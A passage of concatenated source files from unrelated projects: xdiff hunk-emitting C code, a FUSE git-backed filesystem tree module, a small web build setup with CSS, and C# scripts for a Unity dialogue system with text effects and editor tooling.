* You should have received a copy of the GNU Lesser General Public
* License along with this library; if not, write to the Free Software
* Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
*
* <NAME> <<EMAIL>>
*
*/
#include "xinclude.h"
static long xdl_get_rec(xdfile_t *xdf, long ri, char const **rec);
static int xdl_emit_record(xdfile_t *xdf, long ri, char const *pre, xdemitcb_t *ecb);
static long xdl_get_rec(xdfile_t *xdf, long ri, char const **rec) {
*rec = xdf->recs[ri]->ptr;
return xdf->recs[ri]->size;
}
static int xdl_emit_record(xdfile_t *xdf, long ri, char const *pre, xdemitcb_t *ecb) {
long size, psize = strlen(pre);
char const *rec;
size = xdl_get_rec(xdf, ri, &rec);
if (xdl_emit_diffrec(rec, size, pre, psize, ecb) < 0) {
return -1;
}
return 0;
}
/*
* Starting at the passed change atom, find the latest change atom to be included
* inside the differential hunk according to the specified configuration.
*/
xdchange_t *xdl_get_hunk(xdchange_t *xscr, xdemitconf_t const *xecfg) {
xdchange_t *xch, *xchp;
long max_common = 2 * xecfg->ctxlen + xecfg->interhunkctxlen;
for (xchp = xscr, xch = xscr->next; xch; xchp = xch, xch = xch->next)
if (xch->i1 - (xchp->i1 + xchp->chg1) > max_common)
break;
return xchp;
}
static long def_ff(const char *rec, long len, char *buf, long sz, void *priv)
{
if (len > 0 &&
(isalpha((unsigned char)*rec) || /* identifier? */
*rec == '_' || /* also identifier? */
*rec == '$')) { /* identifiers from VMS and other esoterico */
if (len > sz)
len = sz;
while (0 < len && isspace((unsigned char)rec[len - 1]))
len--;
memcpy(buf, rec, len);
return len;
}
return -1;
}
static int xdl_emit_common(xdfenv_t *xe, xdchange_t *xscr, xdemitcb_t *ecb,
xdemitconf_t const *xecfg) {
xdfile_t *xdf = &xe->xdf1;
const char *rchg = xdf->rchg;
long ix;
for (ix = 0; ix < xdf->nrec; ix++) {
if (rchg[ix])
continue;
if (xdl_emit_record(xdf, ix, "", ecb))
return -1;
}
return 0;
}
int xdl_emit_diff(xdfenv_t *xe, xdchange_t *xscr, xdemitcb_t *ecb,
xdemitconf_t const *xecfg) {
long s1, s2, e1, e2, lctx;
xdchange_t *xch, *xche;
char funcbuf[80];
long funclen = 0;
long funclineprev = -1;
find_func_t ff = xecfg->find_func ? xecfg->find_func : def_ff;
if (xecfg->flags & XDL_EMIT_COMMON)
return xdl_emit_common(xe, xscr, ecb, xecfg);
for (xch = xscr; xch; xch = xche->next) {
xche = xdl_get_hunk(xch, xecfg);
s1 = XDL_MAX(xch->i1 - xecfg->ctxlen, 0);
s2 = XDL_MAX(xch->i2 - xecfg->ctxlen, 0);
lctx = xecfg->ctxlen;
lctx = XDL_MIN(lctx, xe->xdf1.nrec - (xche->i1 + xche->chg1));
lctx = XDL_MIN(lctx, xe->xdf2.nrec - (xche->i2 + xche->chg2));
e1 = xche->i1 + xche->chg1 + lctx;
e2 = xche->i2 + xche->chg2 + lctx;
/*
* Emit current hunk header.
*/
if (xecfg->flags & XDL_EMIT_FUNCNAMES) {
long l;
for (l = s1 - 1; l >= 0 && l > funclineprev; l--) {
const char *rec;
long reclen = xdl_get_rec(&xe->xdf1, l, &rec);
long newfunclen = ff(rec, reclen, funcbuf,
sizeof(funcbuf),
xecfg->find_func_priv);
if (newfunclen >= 0) {
funclen = newfunclen;
break;
}
}
funclineprev = s1 - 1;
}
if (xdl_emit_hunk_hdr(s1 + 1, e1 - s1, s2 + 1, e2 - s2,
funcbuf, funclen, ecb) < 0)
return -1;
/*
* Emit pre-context.
*/
for (; s1 < xch->i1; s1++)
if (xdl_emit_record(&xe->xdf1, s1, " ", ecb) < 0)
return -1;
for (s1 = xch->i1, s2 = xch->i2;; xch = xch->next) {
/*
* Merge previous with current change atom.
*/
for (; s1 < xch->i1 && s2 < xch->i2; s1++, s2++)
if (xdl_emit_record(&xe->xdf1, s1, " ", ecb) < 0)
return -1;
/*
* Removes lines from the first file.
*/
for (s1 = xch->i1; s1 < xch->i1 + xch->chg1; s1++)
if (xdl_emit_record(&xe->xdf1, s1, "-", ecb) < 0)
return -1;
/*
* Adds lines from the second file.
*/
for (s2 = xch->i2; s2 < xch->i2 + xch->chg2; s2++)
if (xdl_emit_record(&xe->xdf2, s2, "+", ecb) < 0)
return -1;
if (xch == xche)
break;
s1 = xch->i1 + xch->chg1;
s2 = xch->i2 + xch->chg2;
}
/*
* Emit post-context.
*/
for (s1 = xche->i1 + xche->chg1; s1 < e1; s1++)
if (xdl_emit_record(&xe->xdf1, s1, " ", ecb) < 0)
return -1;
}
return 0;
}
<|start_filename|>fstree.c<|end_filename|>
#include "fstree.h"
#include <fuse.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/stat.h>
static struct node *fsroot = NULL;
static char dirname[PATH_MAX] = "\0";
/* Pathspec: <path>[@<rev>] */
int parse_pathspec(char *xpath, const char *path)
{
int revision;
char *split;
if (!(split = strrchr(path, '@')))
goto END;
revision = atoi(split + 1);
if (revision < 0 || revision > 20)
goto END;
memcpy(xpath, path, split - path);
xpath[split - path] = '\0';
return revision;
END:
strcpy(xpath, path);
return 0;
}
int build_xpath(char *xpath, const char *path, int rev)
{
struct file_record *fr;
char sha1_digest[40];
if (!rev) {
/* Search on FS */
strcpy(xpath, ROOTENV->fsback);
strcat(xpath, path);
return 0;
}
if (!(fr = find_fr(path, rev))) {
PHOENIXFS_DBG("build_xpath:: missing: %s@%d", path, rev);
/* Might be a directory; copy and give to caller */
strcpy(xpath, path);
return -1;
}
print_sha1(sha1_digest, fr->sha1);
sprintf(xpath, "%s/.git/loose/%s", ROOTENV->fsback, sha1_digest);
if (access(xpath, F_OK) < 0) {
/* Try extracting from packfile */
sprintf(xpath, "%s/.git/loose", ROOTENV->fsback);
if (unpack_entry(fr->sha1, xpath) < 0)
return -1;
else
PHOENIXFS_DBG("open:: pack %s", sha1_digest);
}
else
PHOENIXFS_DBG("open:: loose %s", sha1_digest);
return 0;
}
/* filename is simply a pointer; dirname must have alloc'ed memory */
char *split_basename(const char *path, char *dirname)
{
int length;
char *filename;
/* In the worst case, strrchr returns 0: leading '/' */
filename = strrchr(path, '/') + 1;
/* Strip trailing '/' from all directories except '/' itself */
/* +1 to accomodate the null terminator */
length = strlen(path) - strlen(filename);
length = (length == 1 ? 2 : length);
if (!dirname) {
PHOENIXFS_DBG("split_basename:: path: %s, filename: %s",
path, filename);
return filename;
}
memcpy(dirname, path, length - 1);
dirname[length - 1] = '\0';
PHOENIXFS_DBG("split_basename:: path: %s, dirname: %s, filename: %s",
path, dirname, filename);
return filename;
}
void fill_stat(struct stat *st, struct file_record *fr)
{
if (!fr || !st) {
st = NULL;
return;
}
memset(st, 0, sizeof(struct stat));
switch (fr->mode) {
case NODE_EXECUTABLE:
st->st_mode = S_IFREG | 0755;
break;
case NODE_SYMLINK:
st->st_mode = S_IFLNK | 0644;
break;
default:
st->st_mode = S_IFREG | 0644;
}
st->st_nlink = 1;
st->st_mtime = fr->mtime;
st->st_size = fr->size;
}
void fill_fr(struct file_record *fr, struct stat *st)
{
switch(st->st_mode) {
case S_IFREG | 0755:
fr->mode = NODE_EXECUTABLE;
break;
case S_IFLNK | 0644:
fr->mode = NODE_SYMLINK;
break;
default:
fr->mode = NODE_REGULAR;
break;
}
fr->size = st->st_size;
fr->mtime = st->st_mtime;
}
struct node *get_fsroot(void)
{
return fsroot;
}
struct dir_record *find_dr(const char *path)
{
struct dir_record *dr;
uint16_t key = ~0;
size_t length;
length = (size_t) strlen((char *) path);
key = compute_crc32(key, (const unsigned char *) path, length);
if (!(dr = find(fsroot, key, 0))) {
PHOENIXFS_DBG("find_dr:: missing %s", path);
return NULL;
}
PHOENIXFS_DBG("find_dr:: found %s", path);
return dr;
}
struct vfile_record *find_vfr(const char *path)
{
uint16_t key = ~0;
struct dir_record *dr;
struct vfile_record *vfr;
char *filename;
size_t length;
filename = split_basename(path, dirname);
if (!(dr = find_dr(dirname)) || !dr->vroot) {
PHOENIXFS_DBG("find_vfr:: not found %s", path);
return NULL;
}
length = (size_t) strlen((char *) filename);
key = compute_crc32(key, (const unsigned char *) filename, length);
if (!(vfr = find(dr->vroot, key, 0))) {
PHOENIXFS_DBG("find_vfr:: not found %s", path);
return NULL;
}
PHOENIXFS_DBG("find_vfr:: found %s", path);
return vfr;
}
struct file_record *find_fr(const char *path, int rev)
{
struct vfile_record *vfr;
struct file_record *fr;
if (!(vfr = find_vfr(path))) {
PHOENIXFS_DBG("find_fr:: not found %s", path);
return NULL;
}
/* Translate rev to mean "number of revs before HEAD" */
rev = (vfr->HEAD - rev) % REV_TRUNCATE;
if (!(fr = vfr->history[rev])) {
PHOENIXFS_DBG("find_fr:: not found %s", path);
return NULL;
}
PHOENIXFS_DBG("find_fr:: found %s", path);
return fr;
}
void insert_dr(struct dir_record *dr)
{
uint16_t key = ~0;
size_t length;
length = (size_t) strlen((char *) dr->name);
key = compute_crc32(key, (const unsigned char *) dr->name, length);
PHOENIXFS_DBG("insert_dr:: %08X", key);
fsroot = insert(fsroot, key, dr);
}
void insert_vfr(struct dir_record *dr, struct vfile_record *vfr)
{
uint16_t key = ~0;
size_t length;
length = (size_t) strlen((char *) vfr->name);
key = compute_crc32(key, (const unsigned char *) vfr->name, length);
PHOENIXFS_DBG("insert_vfr:: %08X", key);
dr->vroot = insert(dr->vroot, key, vfr);
}
void insert_fr(struct vfile_record *vfr, struct file_record *fr)
{
int newHEAD;
newHEAD = (vfr->HEAD + 1) % REV_TRUNCATE;
vfr->history[newHEAD] = fr;
vfr->HEAD = newHEAD;
PHOENIXFS_DBG("insert_fr:: %s [%d]", vfr->name, vfr->HEAD);
}
struct node *remove_entry(struct node *root, uint16_t key)
{
return delete(root, key);
}
struct dir_record *make_dr(const char *path)
{
struct dir_record *dr;
PHOENIXFS_DBG("make_dr:: %s", path);
if (!(dr = malloc(sizeof(struct dir_record))))
return NULL;
memset(dr, 0, sizeof(struct dir_record));
memcpy(dr->name, path, strlen(path) + 1);
dr->vroot = NULL;
return dr;
}
struct vfile_record *make_vfr(const char *name)
{
struct vfile_record *vfr;
PHOENIXFS_DBG("make_vfr:: %s", name);
if (!(vfr = malloc(sizeof(struct vfile_record))))
return NULL;
memset(vfr, 0, sizeof(struct vfile_record));
memcpy(vfr->name, name, strlen(name) + 1);
memset(vfr->history, 0,
REV_TRUNCATE * sizeof(struct file_record *));
vfr->HEAD = -1;
return vfr;
}
struct file_record *make_fr(const char *path, const char *follow)
{
struct file_record *fr;
unsigned char sha1[20];
char xpath[PATH_MAX];
struct stat st;
FILE *infile;
PHOENIXFS_DBG("make_fr:: %s", path);
if (!(fr = malloc(sizeof(struct file_record))))
return NULL;
memset(fr, 0, sizeof(struct file_record));
build_xpath(xpath, path, 0);
if (lstat(xpath, &st) < 0) {
PHOENIXFS_DBG("make_fr:: can't stat %s", xpath);
free(fr);
return NULL;
}
/* No point computing SHA1 of symlinks */
if (S_ISLNK(st.st_mode)) {
PHOENIXFS_DBG("make_fr:: link %s to %s", path, follow);
memset(fr->sha1, 0, 20);
strcpy((char *) fr->follow, follow);
goto END;
}
/* Compute SHA1 of regular and executable files */
if (!(infile = fopen(xpath, "rb")) ||
(sha1_file(infile, st.st_size, sha1) < 0)) {
free(fr);
return NULL;
}
fclose(infile);
memcpy(fr->sha1, sha1, 20);
strcpy((char *) fr->follow, "\0");
END:
fill_fr(fr, &st);
return fr;
}
void fstree_insert_update_file(const char *path, const char *follow)
{
struct dir_record *dr;
struct vfile_record *vfr;
struct file_record *fr = NULL, *new_fr;
uint16_t key = ~0;
char *filename;
size_t length;
filename = split_basename(path, dirname);
if (!(dr = find_dr(dirname)))
goto DR;
else {
length = (size_t) strlen((char *) filename);
key = compute_crc32(key, (const unsigned char *) filename, length);
if (!(vfr = find(dr->vroot, key, 0))) {
PHOENIXFS_DBG("fstree_insert_update_file:: missing vfr: %s", filename);
goto VFR;
}
else {
if (vfr->HEAD >= 0)
fr = vfr->history[vfr->HEAD];
goto FR;
}
}
DR:
dr = make_dr(dirname);
insert_dr(dr);
VFR:
vfr = make_vfr(filename);
insert_vfr(dr, vfr);
FR:
if (!(new_fr = make_fr(path, follow))) {
PHOENIXFS_DBG("fstree_insert_update_file:: Can't make fr %s", path);
return;
}
/* If content is present in the old fr, don't make a new fr */
if (fr && !memcmp(fr->sha1, new_fr->sha1, 20)) {
PHOENIXFS_DBG("fstree_insert_update_file:: unmodified: %s", path);
free(new_fr);
return;
}
insert_fr(vfr, new_fr);
}
void fstree_remove_file(const char *path)
{
struct dir_record *dr;
struct vfile_record *vfr;
uint16_t key = ~0;
size_t length;
char *filename;
int rev;
filename = split_basename(path, dirname);
length = (size_t) strlen((char *) filename);
key = compute_crc32(key, (const unsigned char *) filename, length);
if (!(dr = find_dr(dirname))) {
PHOENIXFS_DBG("fstree_remove_file:: missing %s", dirname);
return;
}
if (!(vfr = find(dr->vroot, key, 0))) {
PHOENIXFS_DBG("fstree_remove_file:: missing %s", filename);
return;
}
for (rev = 0; ; rev++) {
if (!vfr->history[rev])
break;
free(vfr->history[rev]);
}
PHOENIXFS_DBG("fstree_remove_file:: %s", path);
delete(dr->vroot, key);
dr->vroot = NULL;
}
void fstree_dump_tree(FILE *outfile)
{
dump_dr_tree(fsroot, outfile);
}
void fstree_load_tree(FILE *infile)
{
fsroot = load_dr_tree(infile);
}
void print_fstree(void)
{
node *n = NULL;
int i = 0;
int rank = 0;
int new_rank = 0;
struct node *queue;
FILE *rootlog_fh;
rootlog_fh = fopen("/tmp/phoenixfs.log", "a");
if (fsroot == NULL) {
fprintf(rootlog_fh, "Empty tree.\n");
return;
}
queue = NULL;
enqueue(fsroot);
while (queue != NULL) {
n = dequeue();
if (n->parent != NULL && n == n->parent->pointers[0]) {
new_rank = path_to_root (fsroot, n);
if (new_rank != rank) {
rank = new_rank;
fprintf(rootlog_fh, "\n");
}
}
fprintf(rootlog_fh, "(%lx)", (unsigned long) n);
for (i = 0; i < n->num_keys; i++) {
fprintf(rootlog_fh, "%lx ", (unsigned long) n->pointers[i]);
fprintf(rootlog_fh, "%d ", n->keys[i]);
}
if (!n->is_leaf)
for (i = 0; i <= n->num_keys; i++)
enqueue(n->pointers[i]);
if (n->is_leaf)
fprintf(rootlog_fh, "%lx ", (unsigned long) n->pointers[BTREE_ORDER - 1]);
else
fprintf(rootlog_fh, "%lx ", (unsigned long) n->pointers[n->num_keys]);
fprintf(rootlog_fh, "| ");
}
fprintf(rootlog_fh, "\n");
fclose(rootlog_fh);
}
| sudeepdino008/phoenixfs |
<|start_filename|>web/scripts/build.js<|end_filename|>
const bundler = require("./bundler");
bundler.bundle();
<|start_filename|>web/src/view.css<|end_filename|>
body {
font-size: 14px;
}
.home {
height: 100%;
}
.home .site-header-fixture,
.home .site-header {
background: transparent;
}
.site-header-fixture .site-header {
_position: absolute;
}
.site-header-ghost {
_position: relative;
}
.site-header-fixture a {
line-height: 1;
}
.site-header {
box-shadow: none;
}
.site-header .nav a,
.site-header-ghost .nav a {
padding: 16px 16px;
}
* html .brand {
width: 300px;
}
* html .gmenu {
width: 340px;
}
* html .lang {
width: 130px;
}
.brand a {
display: block;
padding-top: 12px;
color: #fff;
text-decoration: none;
white-space: nowrap;
}
.brand a:hover {
color: #fff;
text-decoration: none;
}
.home .site-body {
height: 100%;
background-image: url(pages/home.jpg);
}
@media screen and (-webkit-min-device-pixel-ratio: 2) {
.home .site-body {
background-image: url(pages/home2x.jpg);
background-size: 1920px 1080px;
}
}
.technology-stack img {
width: 100px;
height: 100px;
}
.panel {
border-width: 1px;
box-shadow: none;
-moz-box-shadow: none;
-webkit-box-shadow: none;
}
.icon {
font-family: "Material Icons";
}
<|start_filename|>web/scripts/serve.js<|end_filename|>
const bundler = require("./bundler");
bundler.serve();
| boiyaa/ie6-compatible-spa |
<|start_filename|>Assets/DialogueSystem/Scripts/Models/Expression.cs<|end_filename|>
namespace DialogueManager.Models
{
using System.Collections;
using System.Collections.Generic;
using UnityEngine;
/// <summary>
/// Different expression faces for the characters
/// </summary>
[System.Serializable]
public class Expression
{
/// <summary> Name of the Character Expression </summary>
[Header( "Expression" )]
public string Name;
/// <summary> Image that will be displayed in the Expression </summary>
public Sprite Image;
/// <summary> Initializes a new instance of the <see cref="Expression"/> class. </summary>
/// <param name="name">Name of the Expression</param>
/// <param name="image">Image showed in the Dialogue</param>
public Expression( string name, Sprite image )
{
this.Image = image;
this.Name = name;
}
/// <summary>
/// Initializes a new instance of the <see cref="Expression"/> class.
/// </summary>
public Expression()
{
this.Name = string.Empty;
}
}
}
<|start_filename|>Assets/DialogueSystem/Scripts/Builders/TextEffectBuilders/AngryEffectBuilder.cs<|end_filename|>
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using UnityEngine;
public class AngryEffectBuilder : ITextEffectBuilder
{
public TextEffect Build( GameObject gameObject )
{
return new AngryEffect(gameObject);
}
}
<|start_filename|>Assets/DialogueSystem/Scripts/GameComponents/ConversationTriggers/PositionTrigger.cs<|end_filename|>
namespace DialogueManager.GameComponents.Triggers
{
using System;
using System.Collections;
using System.Collections.Generic;
using UnityEngine;
// CLASE FEA
//TEMPORAL CLASS
//CLASE PARA PRUEBAS
public class PositionTrigger : MonoBehaviour
{
//NACADAS PARA PROBAR
public GameObject Tracked;
private bool wasTriggered = false;
private Transform tPosition;
private void Start()
{
tPosition = Tracked.GetComponent<Transform>();
}
private void Update()
{
//MAS NACADAS PARA PROBAR
if (tPosition.position.x < this.transform.position.x &&
tPosition.position.y > this.transform.position.y)
{
if (!wasTriggered)
{
wasTriggered = true;
ConversationComponent conversation = this.GetComponent<ConversationComponent>();
if (conversation != null)
{
conversation.Trigger( );
}
}
}
else if (wasTriggered)
{
wasTriggered = false;
}
}
}
}
<|start_filename|>Assets/DialogueSystem/Scripts/GameComponents/TextEffects/TextEffect.cs<|end_filename|>
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using UnityEngine;
public abstract class TextEffect
{
public static Dictionary<string, ITextEffectBuilder> effects = new Dictionary<string, ITextEffectBuilder>
{
{ "normal", null },
{ "angry", new AngryEffectBuilder()},
{ "wave", new WaveEffectBuilder()}
};
public Vector3 m_startPos;
public GameObject gameObject;
public TextEffect(GameObject gameObject )
{
this.gameObject = gameObject;
this.m_startPos = gameObject.transform.localPosition;
}
public abstract void Update();
}
<|start_filename|>Assets/DialogueSystem/Scripts/Editor/NonComponentEditors/DialogueEditor.cs<|end_filename|>
namespace DialogueManager.InspectorEditors
{
using System.Collections.Generic;
using DialogueManager.Models;
using UnityEditor;
using UnityEngine;
/// <summary>
/// Inspector Editor for the Dialogue
/// </summary>
public class DialogueEditor
{
/// <summary> Index of the displayed element in the dialogue Foldout </summary>
private static int dialogueFoldoutDisplay = -1;
/// <summary>
/// Displays on the Inspector GUI a Dialogue
/// </summary>
/// <param name="dialogue">Dialogue to be displayed</param>
public static void Display( Dialogue dialogue )
{
if (dialogue.Sentences == null)
{
dialogue.Sentences = new List<Sentence>();
}
List<Sentence> sentences = dialogue.Sentences;
EditorGUILayout.LabelField( "Dialogue List", EditorStyles.boldLabel );
EditorGUI.indentLevel++;
for (int i = 0; i < sentences.Count; i++)
{
GUILayout.BeginHorizontal();
bool display = i == dialogueFoldoutDisplay;
display = EditorGUILayout.Foldout( display, "Dialogue" + ( i + 1 ) );
if (GUILayout.Button( EditorButtons.RemoveDialogueButton, EditorStyles.miniButton, EditorButtons.MiniButtonWidth ))
{
sentences.RemoveAt( i );
dialogueFoldoutDisplay = -1;
break;
}
GUILayout.EndHorizontal();
if (!display && i == dialogueFoldoutDisplay)
{
dialogueFoldoutDisplay = -1;
}
if (display)
{
dialogueFoldoutDisplay = i;
EditorGUI.indentLevel++;
SentenceEditor.Display( sentences[i] );
EditorGUI.indentLevel--;
}
}
if (GUILayout.Button( EditorButtons.AddDialogueButton, EditorStyles.miniButton, EditorButtons.NormalButtonWidth ))
{
Sentence newSentence = new Sentence();
sentences.Add( newSentence );
}
EditorGUI.indentLevel--;
}
}
}
<|start_filename|>Assets/TextSeparator/ShakeText.cs<|end_filename|>
using System.Collections;
using System.Collections.Generic;
using UnityEngine;
public class ShakeText : MonoBehaviour {
public float Magnitude = 2f;
private Vector3 m_startPos;
private void Start()
{
m_startPos = transform.localPosition;
}
private void Update()
{
float x = Random.Range(-Magnitude, Magnitude);
float y = Random.Range(-Magnitude, Magnitude);
transform.localPosition = m_startPos + new Vector3(x, y, 0.0f);
}
}
<|start_filename|>Assets/DialogueSystem/Scripts/Controllers/GameConversationsController.cs<|end_filename|>
namespace DialogueManager.Controllers
{
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using DialogueManager.GameComponents;
using DialogueManager.Models;
/// <summary>
/// Controller for the GameConversations Component
/// </summary>
public class GameConversationsController
{
/// <summary>
/// Model of the GameConversation
/// </summary>
private GameConversations model;
/// <summary>
/// Initializes a new instance of the <see cref="GameConversationsController"/> class.
/// </summary>
/// <param name="gameConversations">Model of the GameConversations</param>
public GameConversationsController( GameConversations gameConversations )
{
gameConversations.PendingConversations = new Dictionary<string, List<PendingStatus>>();
gameConversations.ConversationsToAdd = new List<PendingStatus>();
this.model = gameConversations;
}
/// <summary>
/// Creates a Key on the PendingConversations with the name of the Conversation if it doesn't exists already.
/// Adds the first element in ConversationsToAdd to the Value PendingConversations with the correct key and sorts the list.
/// </summary>
public void AddConversation()
{
PendingStatus unlockedStatus = this.model.ConversationsToAdd[0];
this.model.ConversationsToAdd.RemoveAt( 0 );
Dictionary<string, List<PendingStatus>> conversations = this.model.PendingConversations;
if (!conversations.ContainsKey( unlockedStatus.ConversationName ))
{
conversations[unlockedStatus.ConversationName] = new List<PendingStatus>();
}
List<PendingStatus> pending = conversations[unlockedStatus.ConversationName];
PendingStatus match = pending.Where( status => status.ConversationName == unlockedStatus.StatusName ).FirstOrDefault();
if (match == null)
{
pending.Add( unlockedStatus );
pending.OrderBy( status => status.Importance );
}
}
}
}
<|start_filename|>Assets/DialogueSystem/Scripts/Controllers/ConversationController.cs<|end_filename|>
namespace DialogueManager.Controllers
{
using System.Collections;
using System.Collections.Generic;
using System.Linq;
using DialogueManager.GameComponents;
using DialogueManager.Models;
using UnityEngine;
/// <summary>
/// Controller for the Conversation Component
/// </summary>
public class ConversationController
{
/// <summary> Model of the Conversation </summary>
private Conversation model;
/// <summary>
/// Initializes a new instance of the <see cref="ConversationController"/> class.
/// </summary>
/// <param name="conversation">Model of the Conversation</param>
public ConversationController(Conversation conversation)
{
conversation.ActiveStatus = conversation.Status[conversation.ActiveStatusIndex];
this.model = conversation;
}
/// <summary>
/// Triggers a Conversation, checking if there is an unlocked Conversation Status and Triggering the correct Status
/// </summary>
/// <param name="dialogueManager">Dialogue Manager where the Dialogue will be displayed</param>
public void Trigger(DialogueManager dialogueManager)
{
var conversations = this.model.GameConversations.PendingConversations;
if (conversations.ContainsKey( this.model.Name ) && conversations[this.model.Name].Count > 0)
{
var statusList = conversations[this.model.Name];
string statusName = statusList[0].StatusName;
statusList.RemoveAt( 0 );
this.model.ActiveStatus = this
.model
.Status
.Where( status => status.Name.Equals( statusName ) )
.First();
this.model.ActiveStatusIndex = this
.model
.Status
.IndexOf( this.model.ActiveStatus );
}
if (this.model.ActiveStatus != null)
{
this.TriggerStatus(dialogueManager);
}
}
/// <summary>
/// Triggers the ActiveStatus and changes it to the NextStatus
/// </summary>
/// <param name="dialogueManager">Dialogue Manager where the Dialogue will be displayed</param>
private void TriggerStatus(DialogueManager dialogueManager)
{
ConversationStatus status = this.model.ActiveStatus;
this.model.GameConversations.ConversationsToAdd.AddRange( status.NewConversations );
dialogueManager.DialogueToShow = status.Dialogue;
this.model.ActiveStatus = status.NextStatus;
this.model.ActiveStatusIndex = status.NextStatusIndex;
}
}
}
<|start_filename|>Assets/DialogueSystem/Scripts/GameComponents/TextEffects/AngryEffect.cs<|end_filename|>
using System.Collections.Generic;
using System.Linq;
using System.Text;
using UnityEngine;
public class AngryEffect : TextEffect
{
public float Magnitude = 2f;
public AngryEffect( GameObject gameObject ) : base( gameObject )
{
}
public override void Update()
{
float x = Random.Range( -Magnitude, Magnitude );
float y = Random.Range( -Magnitude, Magnitude );
this.gameObject.transform.localPosition = m_startPos + new Vector3( x, y, 0.0f );
}
}
<|start_filename|>Assets/DialogueSystem/Scripts/Editor/CharacterEditor.cs<|end_filename|>
namespace DialogueManager.InspectorEditors
{
using System.Collections.Generic;
using DialogueManager.Models;
using UnityEditor;
using UnityEditor.SceneManagement;
using UnityEngine;
/// <summary>
/// Inspector custom editor of the Character Object
/// </summary>
[CustomEditor( typeof( Character ) )]
public class CharacterEditor : Editor
{
/// <summary>
/// When the GUI is displayed
/// </summary>
public override void OnInspectorGUI()
{
EditorGUI.BeginChangeCheck();
serializedObject.Update();
Character character = ( Character )this.target;
character.Name = EditorGUILayout.TextField( "Name", character.Name );
character.Voice = EditorGUILayout.ObjectField( "Voice", character.Voice, typeof( AudioClip ), true ) as AudioClip;
EditorGUILayout.Space();
EditorGUILayout.LabelField( "Expression List", EditorStyles.boldLabel );
if (character.Expressions == null)
{
character.Expressions = new List<Expression>();
}
ExpressionEditor.Display( character.Expressions );
if (GUILayout.Button( EditorButtons.AddExpressionButton, EditorStyles.miniButton, EditorButtons.NormalButtonWidth ))
{
Expression newExpression = new Expression();
character.Expressions.Add( newExpression );
}
if (EditorGUI.EndChangeCheck())
{
serializedObject.ApplyModifiedProperties();
EditorUtility.SetDirty( this.target );
EditorSceneManager.MarkSceneDirty( EditorSceneManager.GetActiveScene() );
}
}
}
}
<|start_filename|>Assets/TextSeparator/WaveText.cs<|end_filename|>
using System.Collections;
using System.Collections.Generic;
using UnityEngine;
public class WaveText : MonoBehaviour
{
public float Frequency = 8.0f;
public float Magnitude = 1.5f;
public float Offset;
private Vector3 m_startPos;
private void Start()
{
m_startPos = transform.localPosition;
}
private void Update()
{
float y = Mathf.Sin((Offset + Time.time) * Frequency) * Magnitude;
transform.localPosition = m_startPos + new Vector3(0.0f, y, 0.0f);
}
}
<|start_filename|>Assets/DialogueSystem/Scripts/Editor/NonComponentEditors/ExpressionEditor.cs<|end_filename|>
namespace DialogueManager.InspectorEditors
{
using System.Collections.Generic;
using DialogueManager.Models;
using UnityEditor;
using UnityEngine;
/// <summary>
/// Inspector Editor for the Conversation Status List
/// </summary>
public class ExpressionEditor
{
/// <summary> Index of the displayed element in the expression List </summary>
private static int expressionFoldoutDisplay = -1;
/// <summary>
/// Displays on the Inspector GUI a List of Expressions
/// </summary>
/// <param name="expressions">Expression List</param>
public static void Display(List<Expression> expressions)
{
for (int i = 0; i < expressions.Count; i++)
{
bool display = i == expressionFoldoutDisplay;
display = EditorGUILayout.Foldout( display, expressions[i].Name );
if (!display && i == expressionFoldoutDisplay)
{
expressionFoldoutDisplay = -1;
}
if (display)
{
expressionFoldoutDisplay = i;
EditorGUILayout.BeginVertical( GUI.skin.box );
GUILayout.BeginHorizontal();
expressions[i].Name = EditorGUILayout.TextField( "Expression Name", expressions[i].Name );
if (GUILayout.Button( EditorButtons.RemoveExpressionButton, EditorStyles.miniButton, EditorButtons.MiniButtonWidth ))
{
expressions.RemoveAt( i );
expressionFoldoutDisplay = -1;
return;
}
GUILayout.EndHorizontal();
expressions[i].Image = EditorGUILayout.ObjectField( "Image", expressions[i].Image, typeof( Sprite ), true ) as Sprite;
EditorGUILayout.EndVertical();
}
}
}
}
}
<|start_filename|>Assets/DialogueSystem/Scripts/GameComponents/DialogueManagerComponent.cs<|end_filename|>
namespace DialogueManager.GameComponents
{
using System.Collections;
using System.Collections.Generic;
using DialogueManager.Controllers;
using DialogueManager.Models;
using UnityEngine;
using UnityEngine.UI;
/// <summary>
/// This class manages the text in the dialogues, the transition between sentences, animations, and such
/// </summary>
public class DialogueManagerComponent : MonoBehaviour
{
/// <summary> Model of the Dialogue Manager </summary>
public DialogueManager Model;
/// <summary> Controller of the Dialogue Manager </summary>
private DialogueManagerController controller;
/// <summary>
/// Is excecuted when the object is instantiated
/// </summary>
private void Awake()
{
GameObject gameConversations = Instantiate( this.Model.GameConversationsPrefab );
gameConversations.name = "GameConversations";
/*
GameObject canvasObject = new GameObject( "DialogueCanvas", typeof(RectTransform) );
Canvas canvas = canvasObject.AddComponent<Canvas>();
canvas.renderMode = RenderMode.WorldSpace;
*/
Transform canvasObject = GameObject.Find( "DialogueCanvas" ).GetComponent<Transform>();
GameObject dialogueBox = Instantiate( this.Model.CanvasObjectsPrefab );
dialogueBox.transform.position = new Vector3( -250, 0, 0 );
dialogueBox.name = "DialogueBox";
dialogueBox.transform.SetParent( canvasObject.transform );
dialogueBox.GetComponent<RectTransform>().localPosition = new Vector3( 0, -500, 0 );
this.Model.DialogueStartPoint = GameObject.Find( "/DialogueCanvas/DialogueBox/DialogueStartPoint" ).GetComponent<Transform>();
this.Model.ImageText = GameObject.Find( "/DialogueCanvas/DialogueBox/CharacterImage" ).GetComponent<Image>();
this.Model.Animator = GameObject.Find( "/DialogueCanvas/DialogueBox" ).GetComponent<Animator>();
this.Model.Source = this.GetComponent<AudioSource>();
this.controller = new DialogueManagerController( this.Model );
}
/// <summary>
/// Checks if there is something in the model to display and if there was an input
/// </summary>
private void Update()
{
if ( this.Model.DialogueToShow != null )
{
this.StartDialogue();
}
if ( Input.GetKeyDown( this.Model.NextKey ) && this.Model.Finished && this.Model.DoubleTap )
{
this.DisplayNextSentence();
this.Model.Finished = false;
}
if ( Input.GetKeyDown( this.Model.NextKey ) && this.Model.DoubleTap == false )
{
this.Model.Finished = true;
this.DisplayNextSentence();
}
}
/// <summary>
/// Start new dialogue, and reset all data from previous dialogues
/// </summary>
private void StartDialogue()
{
this.controller.StartDialogue();
